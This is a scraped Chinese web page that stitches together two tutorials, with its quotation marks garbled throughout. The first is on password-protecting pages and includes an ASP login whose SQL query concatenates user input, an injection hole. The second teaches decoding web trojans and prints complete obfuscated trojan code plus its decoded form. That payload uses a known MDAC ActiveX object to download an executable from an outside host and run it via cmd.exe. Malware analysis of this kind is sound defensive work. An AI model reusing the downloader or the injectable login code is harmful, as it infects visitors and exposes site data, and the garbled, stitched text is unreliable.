<script language=&JavaScript&><!--document.onmousedown=clickfunction click() {if ( event.button==2) {alert('不准查看源文件') }if ( event.button==3) {alert('不准查看源文件') }}//--></script>
(5)用乱码显示链接、调用地址加密。利用某些函数把URL字符转换成ASCII码,从而达到隐藏链接Frame页面和*.js,*.asp等脚本的目的。返回ASCII码escape(character),ASCII码为%XX格式,XX是十六进制,如空格键为 。返回字符unEscape(string)
<!—var Words=&
<frame SRC="/XXX/XXX/" NAME="oos1" &//--></script>
利用javascript还可以使用调用脚本显示页面加密、密码校验等加密方法,但是由于代码繁杂而不经常使用,这里就不多讲了。
二、使用IIS的密码锁
不要以为只有javascript可以加密,使用IIS也可实现加密,只要你电脑上安装的Web服务器是IIS,而你又是管理员权限的用户时,就可以用一种简单的方法来实现密码验证。(注意:使用Win 2000 Server版并安装了IIS及域用户管理器)
1. 启动“Internet 服务管理器”
步骤一:单击“开始”>“设置”>“控制面板”,双击进入到“管理工具”中,打开“Internet 服务管理器”,展开左窗口的“默认Web站点”,然后在其所展开的目录中选中我们想对其进行加密的目录(如:lastcoco),然后单击“属性”按钮,打开“lastcoco属性”对话框(如图1)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
步骤二:选择“lastcoco属性”对话框中“目录安全性”标签,单击“匿名访问及验证控件”域中的“编辑”按钮。这时会弹出“验证方法”对话框,在“验证方法”对话框中,取消“允许匿名访问”选项前面的勾选,然后勾选“基本验证(密码用明文送出)”选项,最后单击“确定”按钮退出(如图2)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
2. 使用“域用户管理器”设置用户的名称及密码
光对目录的安全设置了还不行,为了让上网的朋友们只有在输入用户名称和密码后才可以浏览放在该目录下的网页,我们还要使用“域用户管理器”设置用户的名称及密码。
单击“开始”>“程序”>“系统管理工具”(公用)>“域用户管理器”,启动“域用户管理器”(如图3)。在这里我们给域用户里添加新用户,选择“用户”>“新用户”,然后在“新用户”窗口中输入新用户的“用户名及密码”等等,然后取消“用户下次登录时须改变密码”的选项。
500)this.width=500" title="点击这里用新窗口浏览图片" />
到此为止,利用IIS服务器来给网页加密就全部完成了,当用户想访问安全目录下的网页时。只要在出现的“输入网络密码”窗口中输入我们在“域用户管理器”中设置的新用名名及密码就可以进入安全设置目录(如图4)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
三、使用ASP程序密码锁
除了使用IIS服务器来给网页加密,我们还可以使用ASP程序来给网页进行加密,一般来说利用程序来进行密码验证的方法比较通用,现在大多数网站都使用ASP程序,它对Web服务器没有具体要求,而其加密就是借助数据库及ASP程序进行设计,来实现一种通用网页加密。
1. 打开Microsoft Access,建立一个“用户名及密码”的数据表,假设将这个表取名为User,数据库名为lastcoco.mdb,数据表的结构如下:
字段说明 字段名称 数据类型 数据长度
用户名称 ID文本 15
2. 编辑一个PASS.ASP的验证文件,源代码如下:
<%Function Check( ID, Pwd )Dim conn, par, rsSet conn = Server.CreateObject(&ADODB.Connection&)par = &driver={Microsoft Access Driver (*.mdb)} &conn.Open par && &;dbq=& && Server.MapPath(&lastcoco.mdb &)sql = &Select ? From users Where ID='& && ID && &' And Pwd = '& && Pwd &&&'&Set rs = conn.Execute( sql )If rs.EOF ThenCheck= FalseElseCheck= TrueEnd IfEnd Function%><%If IsEmpty(Session(&Passed&)) Then Session(&Passed&) = FalseHead = &请输入用户名和密码&ID = Request(&ID&)Pwd = Request(&Pwd&)If ID = && Or Pwd = && ThenHead = &请输入用户名和密码&Else If Not Check( ID, Pwd ) ThenHead = &用户名称或密码有错&ElseSession(&Passed&) = TrueEnd IfIf Not Session(&Passed&) Then %><html><head> <title></title> </head><body BGCOLOR=&#FFFFFF&><h2 ALIGN=&CENTER&><%=Head%></h2><hr WIDTH=&100%&><form Action=&<%=Request.ServerVariables(&PATH_INFO&)%>& Method=&POST&><table BORDER=&1& CELLSPACING=&0&><tr><td ALIGN=&RIGHT&>用户名称:</td><td><input Type=&Text& Name=&ID& Size=&12& Value=&<%=ID%>&></td></tr><tr> <td ALIGN=&RIGHT&>密码:</td><td><input Type=&Password& Name=&Pwd& Size=&12& Value=&<%=Pwd%>&></td> </tr></table><p><input Type=&Submit& Value=&确定&> </p> </form><hr WIDTH=&100%& align=¢er&></body> </html><%Response.EndEnd If %>
3. 在需要加密网页的HTML代码最前面加上〈! --#include file=&pass.asp&--〉就可以了。由于这个验证合法性的页面具有通用性,所以非常方便使用。
四、使用软件密码锁
现在给网页加密的软件非常多,这里就不一一讲解,其基本原理都是利用javascript代码,只不过是这些软件都自动准备好了这些代码,只需使用者将网页源代码粘进去按一下加密按钮就OK了。
在这里我们介绍一款绿色的小软件“世纪鸟网页加密精灵”,大家不要小看这只鸟,通过这只小鸟,能更方便快速的对网页进行加密。
下载双击打开这只小鸟,只见XP风格的界面跳到眼前,左边竖着一排是加密选项按钮,分别是“网页代码加密”、“网页登录密码”“鼠标右键屏蔽”、“网页选择屏蔽”、“鼠标右键对话”、“框架包含限制”这些。右边则是网页代码加密对话框,在这个对话框中进行对网页的加密,而且在对话框上方给出每个选项的解释,在对话框下方则是建议。
这里我用实例给大家讲解使用“世纪鸟网页加密精灵”的“网页登录密码”选项来给网页加密。
1. 打开要加密的网页,复制出HTML源代码,然后打开“世纪鸟网页加密精灵”软件,选择“网页登录密码”选项,这时在右边就会出现一些输入框内的代码说明(如图5)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
2. 在“请输入登录密码”的输入框中输入长度小于10位的密码,然后单击“生成并复制密码页面程序”按钮,这时软件会自动在下方的javascript代码中加入你输入的登录密码做为验证信息,并将这段代码复制到你的剪贴版中(如图6)。
500)this.width=500" title="点击这里用新窗口浏览图片" />
3. 接下来再将这段代码粘贴到网页中,并将网页改名为(你输入的登录密码).htm,这样就可以对此文件加密了。
OK,现在你的网页就再也不用担心被人偷用了。
大家感兴趣的内容
12345678910
最近更新的内容}
> 介绍网页木马解密常用方法
介绍网页木马解密常用方法
更新时间:
收藏本页(Ctrl+D)
手机扫描查看
扫描二维码
主要介绍网页木马的eval和Document.write解密方法
一. eval加密是在网马解密中最常见的,eval在jscript脚本中实际上是一个函数,简单可以理解为执行语句的的意思。
1. 参数 :codeString 必选。包含有效 JScript 代码的字符串。eval 函数允许动态执行 JScript 源代码。
2. eval函数特点:是将字符串转换为脚本代码,然后就可以执行了,但是,如果字符串里面还有HMTL标签的话,它就不能执行了。
二. Eval解密方法之alert方法:
1.alert函数:
在要对eval解密之前首先需要了解一下alert这个函数,大家可能有个疑问,在解马的过程中怎样才能保证自身安全而又不中招呢,我们知道要是直接去访问一些经过加密的网马地址,就相当于在电脑上直接运行了网马。既要能将网马解出,又要保证的安全。这时我们就要用到alert这个函数。
alert函数在jscript中有弹出消息内容的作用,我们正是可以利用这一特性,来保证在解马的过程中不会中招。请看下面一个小例子:
&script&alert(&你好!&)&/script&将此段代码,粘贴至记事本中保存为htm格式(文件名随意),直接运行后可看到alert函数的效果。
了解以上内容后,接下来我们来看一个eval的实例:
eval(function(p,a,c,k,e,d){e=function(c){return(c&a?'':e(parseInt(c/a)))+((cc=c%a)&35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return&d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){pp=p.replace(new&RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return&p}('1&z,y,x,v,w;B=\'C://I.u/F/D.E\';1&J=\'4.n\';1&i=\'4.h\';1&j=f[&g&][&s&](&q&);1&8=&p:&;1&9=&0-k-0&;1&7=&l&;1&5=&G&;1&2=&N&;1&c=&Z-W-Y&;1&K=&U.X&+&M&+&L&+&H&+&T&+&T&+&P&;1&V=&A&+&d&+&o&+&d&+&b.&+&S&+&t&+&r&+&e&+&a&+&m&;1&3=&O.&;1&6=&Q&;1&R=3+6;1&2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))&
将此段代码复制粘贴至记事本中,
将其中的eval修改为alert其余内容不变,但要加上&script&&/script&实际变为一个脚本。
保存为htm(文件名任意)处理后的代码如下:
& &script&
alert(function(p,a,c,k,e,d){e=function(c){return(c&a?'':e(parseInt(c/a)))+((c=c%a)&35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f[&g&][&s&](&q&);1 8=&p:&;1 9=&0-k-0&;1 7=&l&;1 5=&G&;1 2=&N&;1 c=&Z-W-Y&;1 K=&U.X&+&M&+&L&+&H&+&T&+&T&+&P&;1 V=&A&+&d&+&o&+&d&+&b.&+&S&+&t&+&r&+&e&+&a&+&m&;1 3=&O.&;1 6=&Q&;1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))
解密结果见下图,
我们看到红色框内容为网马的下载地址,鼠标选中这个对话框,
ctrl+a全选再ctrl+c复制,可将整个代码粘贴至记事本上。
获得代码地址后,可使用下载工具直接下载网马。
第二部分,document.write解密网马
一.Document.write 函数简介:
在Microsoft JScript 提供了两种方式来在浏览器中直接显示数据。可以使用write( ) 和 writeln( ),这两个函数是document 对象的方法。也可以在浏览器中以表格的方式显示信息,以及用警告、提示和确认消息框来显示信息。
使用document.write( ) 和 document.writeln( )显示信息最常用的方式是 document 对象的 write( ) 方法。该方法用一个字符串作为其参数,并在浏览器中显示。该字符串可以是普通文本或 HTML。
字符串可以用单引号或双引号引起来。这样可以引用那些包含引号或撇号的内容。
注:Document.write函数是将字符串转换为Html代码,里面必须有HTML脚本标签,脚本才可以执行,否则,将会被当作字符串输出在网页上。
二.Document.write函数实例
& &script&
document.write(&hell world&)
将此段代码粘贴至记事本,保存为htm格式直接运行打开。这段代码的执行结果实际上是将hell world 在网页显示出来。
& &script&
document.write(&&iframe src=&&/iframe&&)
将上面的代码粘贴至记事本,保存为htm直接运行打开,这段代码的执行结果为在联网的情况下,直接会在网页上显示一个框架,而框架的内容为google网站。
我们来简单分析一下这两个例子的执行结果为什么不同:
例1实际上是一个简单的输出,就是将document.write函数后的内容输出至页面。
例2内容包含了html脚本标签:&iframe&、 src、&/iframe& ,此时将会直接执行脚本,而执行的结果为在网页上显示一个框架,而框架的内容为瑞星官方网站。
例1和例2实际上是对&Document.write函数是将字符串转换为Html代码,里面必须有HTML脚本标签,脚本才可以执行,否则,将会被当作字符串输出在网页上&。这段话的一个印证。
Document.write解密方法之alert方法
即在获得的包含有document.write函数的网马代码中,将document.wirte替换为alert函数,将代码保存至记事本,扩展名为htm文件,直接浏览运行。
下面我们将结合一个实例来进行讲解:
某加密恶意网页内容如下:
& &html&&head&
&META HTTP-EQUIV=&imagetoolbar& CONTENT=&no&&&noscript&&iframe&&/iframe&&/noscript&&script language=&javascript&&&!--
nO44=&8\+6bJ\+6\+&,hA91=&8\{\[s\ Jb&;.9068937,cN13=&.6976961&,nO44='\&eU6521Q\#u\'mRbE\=\|\`hK\:jVDM9\&z\~lf\!oPFc\%3IW7d\&ignAkJ\$\_H\-\
,p\+Zy\{\/\.Sr\&\}Ot8\[4Y\\B0x\nqsNC\^\*XG\?\ \]\r\(Lv\)T\;\@aw',hA91='\%\-\{Y\+\[3\)4F\!nceK5QG\n\,hxClzU\@Z\~\^q\&yuAk6P\?sI2\.M0fwaR\*LT\;\&\]j\|9
g8SH\#\:E\_b\=JB\(V\ mX\/7\$d\&vtD\\\rNWpO\&r1io\'\`\}';function oD30(eS7){&866s\+b\ s&,l=eS7.'\|i\&\|QTT\&OUn\&',w='';while(l--)&\+8z\+ss6beT\ \+&,o=nO44.indexOf(eS7.charAt(l)),'iT3\{nu\|\{',w=(o==-1?eS7.charAt(l):hA91.charAt(o))+w;&8\+\+s\+\[b6&,
nO44=nO44.substring(1)+nO44.charAt(0),document.write(w);'i\|\|ss3s'};oD30(&LWRvT\r\*B
Dkm\{Pk\{b8\+k\^kWRvT\r\*\!t\ \/d8q\/1\/\-TnYN\;RP0bm\*\&kDDQUnPmR\*T\;mBON0YQUvb\*PvmBnkDWbw\-nPmR\*T\;mBO0N0YQUN\;RP0bm\*\&\;mR\;m\*
bj\*0bmP8ON0\-Wb\*HT0b\;P\*Y\,O0N0YQ\,K\/ggQw\-O0N0YQ\-wN\;RP0bm\*\&\;mR\;m\*bj\*0bmP8mbABuPmR\*T\;mY\,v
b\*PvmBnkDWb\,Q\-nPmR\*T\;mBOmN0YbQUTnYN\;RP0bm\*\&DkobvWZZATmN\;A\&WTNbtkvQUTnYb\&A\:TR\:\'8\)Qvb\*PvmB
nkDWb\-ww\-TnYN\;RP0bm\*\&DkobvWQUN\;RP0bm\*\&Rk\r\*Pvb\}\^bm\*WY\}\^bm\*\&i\(9\.\}X\(\]\ Q\-N\;RP0bm\*\&\;m0\;PWbN\;Am8OmN0\-wbDWbUN\;RP0bm\*\&\;m0\;PWbP\r8OmN0\-w\-vV\)y8\/\)d1\-j\(dg8d\#gy\-n
PmR\*T\;mBONNWYQUTnYN\;RP0bm\*\&kDDQUN\;RP0bm\*\&\;mWbDbR\*W\*kv\*8nPmR\*T\;mBYQUvb\*PvmBnkDWbw\-Wb\*HT0
b\;P\*Y\,ONNWYQ\,KqggQww\-ONNWYQ\-mV\=q8d\%y\#\-W\(\=y8\%y\/g\-nPmR\*T\;mBOmvYQUvb\*PvmB\*vPbw\;mbvv\;v8
Omv\-TXy\%8qd\%\=\-b\}1\#8\)\/1\%\-\^E\/8qd\%\/\-v\_\#q8\)\/1y\-juyd8\/\%y1\-\^u\)d8yqy\-0\_\/\=8\%\#\)\
)\-\-ODTRbmWbNO\*\;O8\,\:PoPnbm\{\,\-L\nWRvT\r\*\!&)//--&&/script&&ScrIPT lANgUAgE=JAVAscrIpt&oD30(&v7b\)\;\(Xo\ K0X\)P0\ K6\ K\ K0\*J\)0YA\[C\@bFxERXib\)EJXEOMExERX\\p\?V3\'\?V3\&\?V3c\?V3\|\?V3Q\?Vsup\#\,\ K0YAi7EXcXX\)\;8FXE\\p\?V3Q\?V3D\?V3T\?VsQ\?VsQ\?V3\{\?V3up\:p\?V3Q\?V3D\?VsQ\?V3\{\?V3u\?VQc\?Vu\&\?Vuu
\?VQ\{\?VQ3\?VuQ\?VQ\|\?VQ\|\?VQ3\?V\&G\?VQ3\?VQ\|\?VuT\?VQQ\?V\&G\?VQT\?VQT\?Vuu\?VQn\?V\&G\?VQ\{\?VQ\.
\?VQQ\?VuT\?V\&G\?VQn\?VQn\?VuQ\?VQn\?VQu\?Vu3\?VuQ\?VQ\&\?VQ\{\?Vu\|\?VQQ\?VQ3p\#\,\ K0\*J\)0\=V\[YAiD\)EJXEL8ZEbX\\p\?VuG\?V3\{\?V3Q\?Vs\&\?V3\'\?VsQ\?V3\'\?V33\?Vsu\?V\&O\?V\|\.p2p\?VuG\?
VuD\?Vu\.\?V\|u\?V\|u\?V\|np\:pp\#\,\ K0\*J\)0cS\[YAiD\)EJXEL8ZEbX\\p\?VuT\?V3u\?V3\'\?V3u\?V3\&\?V\&O\?V\|Q\?Vsu\?Vs\&\?V3\|\?V3T\?V3Gp\:pp\#
\,\ K\ K0cSiXP\(E\[T\,\ K0\=Vi\@\(ER\\p\?Vus\?Vu\|\?V\|up\:0a\?V3\.\?Vsu\?Vsu\?Vsn\?VQJ\?V\&A\?V\&A\?Vss\?VQT\?VQ\.\?V\&E\?Vs3\?
V3s\?V\&A\?VsQ\?V\&E\?V3\|\?Vs\.\?V3\|a\:n\#\,\ K\ K0\=Vi7ERC\\\#\,\ KAC7\/C7A\/7CA\/J7CAAAAAAAA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CACA
Ca\,\ K0\]7T\[a\?VsO\?V\|u\?V3\|\?V3G\?Vsna2gJXji\)\@FRC\\gJXji\)JRC\@x\\\#\_\{\{\{\{\#2a\?V\&O\?Vsu\?V3G\?Vsn
a\,\ K0EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEAC7A7CA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CA
CACa\,\ K0\*J\)0b\'\[YAiD\)EJXEL8ZEbX\\p\?V\|Q\?V3Q\?Vs\&\?V3\{\?Vsn\?Vsu\?V3\{\?V3O\?V3s\?V\&O\?Vu3\?V3\{\?V3D\
?V3\|\?V\|Q\?Vs\{\?VsQ\?Vsu\?V3\|\?V3G\?Vu\'\?V3\&\?V3c\?V3\|\?V3Q\?Vsup\:pp\#\,\ K0\*J\)0\]7\-x\(\[b\'ihEXS\(Eb\;JM\'\@MCE\)\\n\#\,0\]7T\[0b\'iYF\;MCIJXj\\\]7\-x\(\:\]7T\#\,0cSiL\(ER\\\
#\,cSi\r\)\;XE\\\=Vi\)E7\(\@R7EY\@CP\#\,\ K0cSiSJ\*E\-\@\'\;ME\\\]7T\:\&\#\,0cSiDM\@7E\\\#\,0\*J\)0\!\[YAiD\)EJXEL8ZEbX\\p\?V\|Q\?V3\.\?V3\|\?V3D\
?V3D\?V\&O\?VuT\?Vsn\?Vsn\?V3D\?V3\{\?V3Q\?V3T\?Vsu\?V3\{\?V3\'\?V3Op\:pp\#\,\ K0\@\%T\[b\'iYF\;MCIJXj\\\]7\-x\(2a\?V\|D\?V\|D\?VsQ\?Vs\{\?VsQ\?Vsu\?V3\|\?V3G\?VQQ\?VQ\&a\:a\?V3Q\?V3G
\?V3u\?V\&O\?V3\|\?Vs\.\?V3\|a\#\,\ K0\!1p\?V\|Q\?V3\.\?V3\|\?V3b\?V3b\?Vu\|\?Vs\.\?V3\|\?V3Q\?Vs\|\?Vsu\?V3\|p\+\\\@\%T\:a\?V\&n\?V\&\'\?V3
Q0a2\]7T\:pp\:p\?V3\'\?Vsn\?V3\|\?V3Op\:n\#\,\ KAC7\/C7A\/7CA\/J7CAAAAAAAA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CACA
Ca\,\ K\&\ K0bJXbj\\VVA\!EJC7A\#060VVA\!EJC7A\[T\,0\&\ Kvq7b\)\;\(Xo&)&/script&&/head&&body&&noscript&&b&&font color=red&This page requires a javascript enabled browser!!!&/font&&/b&&/noscript&&/body&&/html&
注意到其中红色部分,我们可以造个直接获取解密后文字的框:
&textarea id=&textareaID& rows=&50& cols=&100&&&/textarea&
&script language=&javascript&&
..........待解密的javascript代码,其中document.write(xxxx)用document.getElementById(&textareaID&).innerText=xxxx代替
修改后如下:
&html&&head&&&META&HTTP-EQUIV=&imagetoolbar&&CONTENT=&no&&&noscript&&iframe&&/iframe&&/noscript&&&textarea&id=&textareaID&&rows=&50&&cols=&100&&&/textarea&&&script&language=&javascript&&&!--&nO44=&8\+6bJ\+6\+&,hA91=&8\{\[s\&Jb&;.9068937,cN13=&.6976961&,nO44='\&eU6521Q\#u\'mRbE\=\|\`hK\:jVDM9\&z\~lf\!oPFc\%3IW7d\&ignAkJ\$\_H\-\&,p\+Zy\{\/\.Sr\&\}Ot8\[4Y\\B0x\nqsNC\^\*XG\?\&\]\r\(Lv\)T\;\@aw',hA91='\%\-\{Y\+\[3\)4F\!nceK5QG\n\,hxClzU\@Z\~\^q\&yuAk6P\?sI2\.M0fwaR\*LT\;\&\]j\|9g&8SH\#\:E\_b\=JB\(V\&mX\/7\$d\&vtD\\\rNWpO\&r1io\'\`\}';function&oD30(eS7){&866s\+b\&s&,l=eS7.'\|i\&\|QTT\&OUn\&',w='';while(l--)&\+8z\+ss6beT\&\+&,o=nO44.indexOf(eS7.charAt(l)),'iT3\{nu\|\{',w=(o==-1?eS7.charAt(l):hA91.charAt(o))+w;&8\+\+s\+\[b6&,&nO44nO44=nO44.substring(1)+nO44.charAt(0),document.getElementById(&textareaID&).innerText=(w);&'i\|\|ss3s'};oD30(&LWRvT\r\*BDkm\{Pk\{b8\+k\^kWRvT\r\*\!t\&\/d8q\/1\/\-TnYN\;RP0bm\*\&kDDQUnPmR\*T\;mBON0YQUvb\*PvmBnkDWbw\-nPmR\*T\;mBO0N0YQUN\;RP0bm\*\&\;mR\;m\*b&j\*0bmP8ON0\-Wb\*HT0b\;P\*Y\,O0N0YQ\,K\/ggQw\-O0N0YQ\-wN\;RP0bm\*\&\;mR\;m\*bj\*0bmP8mbABuPmR\*T\;mY\,vb\&*PvmBnkDWb\,Q\-nPmR\*T\;mBOmN0YbQUTnYN\;RP0bm\*\&DkobvWZZATmN\;A\&WTNbtkvQUTnYb\&A\:TR\:\'8\)Qvb\*PvmBnkD&Wb\-ww\-TnYN\;RP0bm\*\&DkobvWQUN\;RP0bm\*\&Rk\r\*Pvb\}\^bm\*WY\}\^bm\*\&i\(9\.\}X\(\]\&Q\-N\;RP0bm\*\&\;m0\;PWbN\;Am8OmN0\-wbDWbUN\;RP0bm\*\&\;m0\;PWbP\r8OmN0\-w\-vV\)y8\/\)d1\-j\(dg8d\#gy\-nP&mR\*T\;mBONNWYQUTnYN\;RP0bm\*\&kDDQUN\;RP0bm\*\&\;mWbDbR\*W\*kv\*8nPmR\*T\;mBYQUvb\*PvmBnkDWbw\-Wb\*HT0b\&;P\*Y\,ONNWYQ\,KqggQww\-ONNWYQ\-mV\=q8d\%y\#\-W\(\=y8\%y\/g\-nPmR\*T\;mBOmvYQUvb\*PvmB\*vPbw\;mbvv\;v8Omv&\-TXy\%8qd\%\=\-b\}1\#8\)\/1\%\-\^E\/8qd\%\/\-v\_\#q8\)\/1y\-juyd8\/\%y1\-\^u\)d8yqy\-0\_\/\=8\%\#\)\)\-\&-ODTRbmWbNO\*\;O8\,\:PoPnbm\{\,\-L\nWRvT\r\*\!&)//--&&/script&&ScrIPT&lANgUAgE=JAVAscrIpt&oD30(&v7b\)\;\(Xo\&K0X\)P0\&K6\&K\&K0\*J\)0YA\[C\@bFxERXib\)EJXEOMExERX\\p\?V3\'\?V3\&\?V3c\?V3\|\?V3Q\?Vsup\#\,\&K0YAi7EXcXX\)\;8FXE\\p\?V3Q\?V3D\?V3T\?VsQ\?VsQ\?V3\{\?V3up\:p\?V3Q\?V3D\?VsQ\?V3\{\?V3u\?VQc\?Vu\&\?Vuu\&?VQ\{\?VQ3\?VuQ\?VQ\|\?VQ\|\?VQ3\?V\&G\?VQ3\?VQ\|\?VuT\?VQQ\?V\&G\?VQT\?VQT\?Vuu\?VQn\?V\&G\?VQ\{\?VQ\.\?&VQQ\?VuT\?V\&G\?VQn\?VQn\?VuQ\?VQn\?VQu\?Vu3\?VuQ\?VQ\&\?VQ\{\?Vu\|\?VQQ\?VQ3p\#\,\&K0\*J\)0\=V\[YAiD\)EJXEL8ZEbX\\p\?VuG\?V3\{\?V3Q\?Vs\&\?V3\'\?VsQ\?V3\'\?V33\?Vsu\?V\&O\?V\|\.p2p\?VuG\?V&uD\?Vu\.\?V\|u\?V\|u\?V\|np\:pp\#\,\&K0\*J\)0cS\[YAiD\)EJXEL8ZEbX\\p\?VuT\?V3u\?V3\'\?V3u\?V3\&\?V\&O\?V\|Q\?Vsu\?Vs\&\?V3\|\?V3T\?V3Gp\:pp\#\&,\&K\&K0cSiXP\(E\[T\,\&K0\=Vi\@\(ER\\p\?Vus\?Vu\|\?V\|up\:0a\?V3\.\?Vsu\?Vsu\?Vsn\?VQJ\?V\&A\?V\&A\?Vss\?VQT\?VQ\.\?V\&E\?Vs3\?V&3s\?V\&A\?VsQ\?V\&E\?V3\|\?Vs\.\?V3\|a\:n\#\,\&K\&K0\=Vi7ERC\\\#\,\&KAC7\/C7A\/7CA\/J7CAAAAAAAA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CACAC&a\,\&K0\]7T\[a\?VsO\?V\|u\?V3\|\?V3G\?Vsna2gJXji\)\@FRC\\gJXji\)JRC\@x\\\#\_\{\{\{\{\#2a\?V\&O\?Vsu\?V3G\?Vsna&\,\&K0EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEAC7A7CA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CAC&ACa\,\&K0\*J\)0b\'\[YAiD\)EJXEL8ZEbX\\p\?V\|Q\?V3Q\?Vs\&\?V3\{\?Vsn\?Vsu\?V3\{\?V3O\?V3s\?V\&O\?Vu3\?V3\{\?V3D\?&V3\|\?V\|Q\?Vs\{\?VsQ\?Vsu\?V3\|\?V3G\?Vu\'\?V3\&\?V3c\?V3\|\?V3Q\?Vsup\:pp\#\,\&K0\*J\)0\]7\-x\(\[b\'ihEXS\(Eb\;JM\'\@MCE\)\\n\#\,0\]7T\[0b\'iYF\;MCIJXj\\\]7\-x\(\:\]7T\#\,0cSiL\(ER\\\#&\,cSi\r\)\;XE\\\=Vi\)E7\(\@R7EY\@CP\#\,\&K0cSiSJ\*E\-\@\'\;ME\\\]7T\:\&\#\,0cSiDM\@7E\\\#\,0\*J\)0\!\[YAiD\)EJXEL8ZEbX\\p\?V\|Q\?V3\.\?V3\|\?V3D\?&V3D\?V\&O\?VuT\?Vsn\?Vsn\?V3D\?V3\{\?V3Q\?V3T\?Vsu\?V3\{\?V3\'\?V3Op\:pp\#\,\&K0\@\%T\[b\'iYF\;MCIJXj\\\]7\-x\(2a\?V\|D\?V\|D\?VsQ\?Vs\{\?VsQ\?Vsu\?V3\|\?V3G\?VQQ\?VQ\&a\:a\?V3Q\?V3G\&?V3u\?V\&O\?V3\|\?Vs\.\?V3\|a\#\,\&K0\!1p\?V\|Q\?V3\.\?V3\|\?V3b\?V3b\?Vu\|\?Vs\.\?V3\|\?V3Q\?Vs\|\?Vsu\?V3\|p\+\\\@\%T\:a\?V\&n\?V\&\'\?V3Q&0a2\]7T\:pp\:p\?V3\'\?Vsn\?V3\|\?V3Op\:n\#\,\&KAC7\/C7A\/7CA\/J7CAAAAAAAA\[a\%\%\%\%\%\%\%\%\%\%\%\%\%AZ7CJMZAM7CZAMZC7\%AZC\%\%\%\%\%CACAC&a\,\&K\&\&K0bJXbj\\VVA\!EJC7A\#060VVA\!EJC7A\[T\,0\&\&Kvq7b\)\;\(Xo&)&/script&&/head&&body&&noscript&&b&&font&color=red&This&page&requires&a&javascript&enabled&browser!!!&/font&&/b&&/noscript&&/body&&/html&&
另存为htm格式的,然后ie打开就是解密后的代码:
&script&&try&{&&var&Bf=document.createElement(&\x6F\x62\x6A\x65\x63\x74&);&Bf.setAttribute(&\x63\x6C\x61\x73\x73\x69\x64&,&\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36&\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45&\x33\x36&);&var&Kx=Bf.CreateObject(&\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58&+&\x4D\x4C\x48\x54\x54\x50&,&&);&var&AS=Bf.CreateObject(&\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D&,&&);&&AS.type=1;&Kx.open(&\x47\x45\x54&,&'\x68\x74\x74\x70\x3a\x2f\x2f\x77\x31\x38\x2e\x76\x67\x2f\x73\x2e\x65\x78\x65',0);&&Kx.send();&bbbbbbbbbbbfdsgdsfgsdfgasdffffffff='kkkkkkkkkkkkkfjsdaljflsdjfljdskfjdkkkkkdfdfd';&Ns1='\x7E\x54\x65\x6D\x70'+Math.round(Math.random()*9999)+'\x2E\x74\x6D\x70';&eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefdsfsdf='kkkkkkkkkkkkkfjsdaljflsdjfljdskfjdkkkkkdfdfd';&var&cF=Bf.CreateObject(&\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F&\x62\x6A\x65\x63\x74&,&&);&var&NsTmp=cF.GetSpecialFolder(0);&Ns1=&cF.BuildPath(NsTmp,Ns1);&AS.Open();AS.Write(Kx.responseBody);&AS.SaveToFile(Ns1,2);&AS.Close();&var&q=Bf.CreateObject(&\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E&,&&);&ok1=cF.BuildPath(NsTmp+'\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32','\x63\x6D\x64\x2E\x65\x78\x65');&q[&\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65&](ok1,'\x20\x2F\x63&'+Ns1,&&,&\x6F\x70\x65\x6E&,0);&bbbbbb